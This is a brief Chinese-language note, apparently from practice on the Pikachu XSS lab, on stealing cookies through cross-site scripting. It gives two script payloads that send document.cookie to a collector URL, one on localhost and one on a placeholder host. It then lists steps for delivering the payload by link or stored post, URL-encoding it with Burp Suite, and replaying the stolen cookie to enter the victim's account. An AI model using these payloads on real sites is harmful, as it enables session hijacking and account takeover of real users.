XSS最关键的一步

1，发给攻击目标

<script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

<script>document.location='http://urltogetcookie/cookie.php?cookie='+document.cookie;</script>

 

2，由cookie.php负责存储该cookie

 

3，只要目标能获得该域的cookie就行。也许没有登录，也许已经登录。总之有document.cookie即可

 

4，可以get方式（发链接），也可以是post方式（存储型）

 

5，若url形式，最好url编码后面的代码部分。用burpsuite之，decoder之encoder as URL

 

6，拿到cookie之后利用burpsuite改数据包之cookie进入系统。